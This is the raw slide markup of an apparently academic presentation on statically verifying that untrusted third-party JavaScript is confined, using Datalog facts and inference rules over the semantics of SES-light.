              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>n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  <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> by the set of all statements that can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>    written using free variables {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="22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2400" y="1295400"/>
            <a:ext cx="8839200" cy="965344"/>
            <a:chOff x="152400" y="3352800"/>
            <a:chExt cx="8839200" cy="965344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="152400" y="3352800"/>
              <a:ext cx="8839200" cy="96534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mpd="sng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Confine(t</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, critical)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>For all untrusted terms </a:t>
              </a:r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s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> in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SES</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>light</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
            </a:p>
            <a:p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</a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13" descr="latex-image-1.pdf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3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
            </mc:Choice>
            <mc:Fallback>
              <p:blipFill>
                <a:blip r:embed="rId4"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
            </mc:Fallback>
          </mc:AlternateContent>
          <p:spPr>
            <a:xfrm>
              <a:off x="292100" y="3886200"/>
              <a:ext cx="7937500" cy="3175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 Verifying </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Confine(t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, critical)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3400" i="1" dirty="0">
              <a:latin typeface="Times"/>
              <a:cs typeface="Time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6032" y="3282563"/>
            <a:ext cx="2135604" cy="3843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Trusted code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6032" y="4173957"/>
            <a:ext cx="2135604" cy="6359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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval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with free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vars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”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>test”,“api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”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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032" y="5343270"/>
            <a:ext cx="2135604" cy="6035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Environment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(Built-ins)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032" y="4733670"/>
            <a:ext cx="21356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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+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032" y="3551984"/>
            <a:ext cx="21356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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+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2746375"/>
            <a:ext cx="2362200" cy="327342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2590800" y="4267200"/>
            <a:ext cx="609600" cy="304800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4" name="Alternate Process 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="3581399"/>
            <a:ext cx="2209800" cy="182893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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Datalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Solver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(least fixed point) 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95600" y="2057400"/>
            <a:ext cx="29718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/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Inference  Rules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SES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>light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semantics)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4191000" y="3044693"/>
            <a:ext cx="304800" cy="460507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8" name="Decision 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="3733800"/>
            <a:ext cx="2742404" cy="1208759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24600" y="4084020"/>
            <a:ext cx="2742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Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> ∧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Times"/>
              <a:ea typeface="ＭＳ ゴシック"/>
              <a:cs typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Critical(l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7314802" y="3352800"/>
            <a:ext cx="762000" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent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5638800" y="4191000"/>
            <a:ext cx="609600" cy="304800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0" y="2514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 CONFINED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7162800" y="577209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CONFINED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Straight Arrow Connector 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7281236" y="5357125"/>
            <a:ext cx="829531" cy="398"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent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696200" y="3352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696200" y="48884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52400" y="2746375"/>
            <a:ext cx="236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Abstraction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200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1219200"/>
            <a:ext cx="8990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Our decision procedure and implementation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 smtClean="0"/>
              <a:t>Web 2.0 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" err="1" smtClean="0"/>
              <a:t>Webpages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3900" dirty="0" smtClean="0"/>
              <a:t> with Third-party Code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770437"/>
            <a:ext cx="9067800" cy="1401763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3027" dirty="0" smtClean="0"/>
              <a:t>Lots of client-side JavaScript, AJAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3027" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3027" dirty="0" smtClean="0"/>
              <a:t>: Millions of users, loads of e-commerce, $$$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 descr="yel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990600"/>
            <a:ext cx="4495800" cy="3581400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="admashu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90600"/>
            <a:ext cx="4474156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Express Analysis in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Datalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3333" dirty="0" smtClean="0"/>
              <a:t>Whaley et al.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1"/>
            <a:ext cx="2286000" cy="1600199"/>
          </a:xfrm>
          <a:ln w="19050" cmpd="sng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b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" i="1" dirty="0" smtClean="0">
              <a:latin typeface="Times"/>
              <a:cs typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>:var y = {};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>:var x = y;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>:x.f = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Courier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791200" y="1828801"/>
            <a:ext cx="1981200" cy="1600199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050" cmpd="sng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1" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Facts(t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Time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200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" baseline="-25000" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2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Assign(x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, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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y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Store(x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,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2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 “</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>”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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>y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962400" y="2474670"/>
            <a:ext cx="1447800" cy="497132"/>
            <a:chOff x="3505200" y="2627068"/>
            <a:chExt cx="1447800" cy="497132"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Right Arrow 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3505200" y="2637865"/>
              <a:ext cx="1447800" cy="48633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05200" y="2627068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abstract</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="24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04800" y="1114722"/>
            <a:ext cx="8458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82880">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Abstract programs as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Datalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> facts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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4800" y="3657600"/>
            <a:ext cx="8534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buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Abstract the semantics of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>light</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Datalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> inference rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>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95400" y="4350603"/>
            <a:ext cx="6477000" cy="8309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latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(x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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>:-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Assign(x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y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(y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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Heap(l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f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m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>:-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Store(x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f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y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(x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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(y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err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Times"/>
              <a:cs typeface="Time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53340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82880">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Execution of program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is abstracted by the least-fixed-point of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Facts(t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> under the inference rules </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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 animBg="1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set of Predicates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1366520"/>
          <a:ext cx="7315200" cy="29006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94506"/>
                <a:gridCol w="1877833"/>
                <a:gridCol w="1742661"/>
                <a:gridCol w="1600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Abstracting </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2200" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>terms</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2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Abstracting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dirty="0" smtClean="0"/>
                        <a:t>Heaps &amp; Stacks</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2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Assign(x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y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Throw(l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Heap(l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m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Stack(x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Load(x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y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f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Catch(l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Prototype(l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m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FuncType(l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Store(x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f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y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TP(l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ObjType(l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ArrayType(l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Formal(l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i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FormalRet(l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NotBuiltin(l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Critical(l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Actual(x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i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z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y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Instance(l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Global(x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Annotation(x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, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Times"/>
                          <a:cs typeface="Times"/>
                        </a:rPr>
                        <a:t>y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                          <a:latin typeface="Times"/>
                          <a:cs typeface="Times"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r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"/>
                        <a:cs typeface="Time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4572000"/>
            <a:ext cx="8839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Sufficient to model implicit type conversions, reflection, exceptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
